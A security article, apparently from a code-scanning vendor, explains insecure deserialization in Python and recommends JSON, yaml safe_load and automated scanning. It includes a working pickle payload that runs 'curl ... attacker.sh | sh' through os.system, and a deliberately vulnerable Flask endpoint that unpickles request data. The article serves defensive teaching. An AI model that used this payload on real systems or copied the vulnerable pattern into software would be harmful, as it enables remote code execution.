Insecure Deserialization in Python: Understanding the Risks and Safer Alternatives
Insecure deserialization has been a recurring entry in the OWASP Top 10 list of web application risks, and for good reason. The Python ecosystem in particular provides developers with powerful libraries for serializing and deserializing objects, but these same features can expose applications to remote code execution or denial of service. A notable example is Django’s decision to deprecate the PickleSerializer
in version 4.1, acknowledging that thepickle
module from Python’s standard library is inherently unsafe for deserialization.
For Python developers, this risk is anything but theoretical. If your application deserializes data, you may be giving attackers a way in. The impact can range from unexpected crashes to a full system compromise. It’s worth stressing: Python’s pickle
and similar libraries should never be used to process untrusted input. They were built for speed and flexibility, not security.
In this article, we explain the fundamentals of serialization in Python. Then, we illustrates the most common ways insecure deserialization is exploited, and show you how to detect these patterns in your own code. Finally, we provide some practical recommendations to avoid the risks.
Pickling and unpickling
Serialization is the process of converting Python objects into a format that can be stored or transmitted, while deserialization restores them back into usable objects. This solves a practical problem: developers need a way to save program state, transfer structured data across the network, or exchange complex objects between systems.
Python’s infamous pickle
module was created to solve exactly this problem. It allows arbitrary Python objects to be serialized and later reconstructed. The design is intentionally permissive: objects can control how they are pickled and unpickled, and the process can invoke functions or methods during reconstruction. This flexibility makes pickle
extremely convenient, but it also introduces a significant security risk. By design, deserialization can execute code, which means an attacker who controls the input data can run arbitrary commands.
Other libraries extend or reuse the same approach. dill
adds more object types to what can be serialized, jsonpickle
uses JSON as a transport format but still permits arbitrary Python object reconstruction, and shelve
simply stores pickled objects in a file-like database. Even PyYAML, a popular choice for configuration files, defaults to unsafe loading modes unless developers explicitly call safe_load
. These features exist to make the developer’s life easier but also increase the attack surface when used on untrusted data.
Insecure Deserialization Attacks
The most severe outcome of insecure deserialization is remote code execution. In this case, an attacker provides a serialized payload that, when deserialized, executes system commands.
import pickle, os
class Exploit(object):
def __reduce__(self):
return (os.system, ("curl http://semgrep.dev/attacker.sh | sh",))
payload = pickle.dumps(Exploit())
In the minimal example shown above, a pickle payload is crafted that calls os.system
to fetch and run a script from a domain such as semgrep.dev
. The deserialization process is not just restoring an object; it is executing arbitrary code on the server.
How To Detect Insecure Deserialization In Your Code
Consider a Python web server built using the standard library’s http.server
module. A developer might be tempted to unpickle data received in a request for convenience.
import pickle
from flask import Flask, request
import io
app = Flask(__name__)
@app.route("/deserialize", methods=["POST"])
def deserialize():
# Attacker controls request body
raw_data = request.data
obj = pickle.load(io.BytesIO(raw_data))
return str(obj)
In this example, the call to pickle.load
is applied directly to data derived from user input. If an attacker crafts a malicious pickle string, it will be executed when the handler processes the request. This is precisely the kind of pattern Semgrep’s rules can detect. The rules track data flow from untrusted sources such as HTTP request paths or headers and flag places in the code where it when it reaches sensitive functions like pickle.loads
. Semgrep currently covers over a dozen Python libraries with known insecure deserialization functions.
Recommendations & Mitigations
The simplest and most effective recommendation is to avoid pickle
and its variants (_pickle
, cPickle
, dill
, jsonpickle
, shelve
) for any untrusted input. These libraries cannot be made safe against arbitrary input because they allow execution by design. Use YAML or JSON to transfer and store data instead.
We highly recommend to use automated tools to verify compliance, since many more libraries use deserialisation powered by libraries such as pickle
under the hood. Running Semgrep regularly as part of your continuous integration pipeline can highlight insecure deserialization patterns before they reach production.
A few examples for popular libraries:
- In Django, never switch back to the deprecated
PickleSerializer
for sessions. - In NumPy, avoid setting
allow_pickle=True
when callingnumpy.load
. - In PyTorch, prefer using the
weights_only=True
flag when callingtorch.load
to prevent deserialization of arbitrary Python objects.
Conclusion
Insecure deserialization in Python is not just a theoretical concern; it is a practical risk that arises whenever untrusted data is passed to permissive deserialization libraries. The fundamental issue is that modules such as pickle
are designed to execute code during deserialization, making them unsuitable for handling external input.
We have seen how serialization works in Python, why features like pickle
introduce risks, how attackers exploit them through remote code execution, and how Semgrep can detect vulnerable patterns in your own projects. The path forward is clear: avoid unsafe libraries for untrusted data, choose safer alternatives like JSON or safe_load
for YAML, and rely on automated scanning to catch mistakes early.
As the deprecation of Django’s PickleSerializer
illustrates, the community has recognized the risks of insecure deserialization. By taking a disciplined approach to the libraries you use and by applying tools like Semgrep, you can ensure your Python applications remain resilient against this class of vulnerabilities.
For more guidance and practical rules, see the Semgrep documentation and consider scanning your codebase with our Pro rules. Identifying and fixing insecure deserialization today will save you from severe problems tomorrow.
Not finding what you need in this doc? Ask questions in our Community Slack group, or see Support for other ways to get help.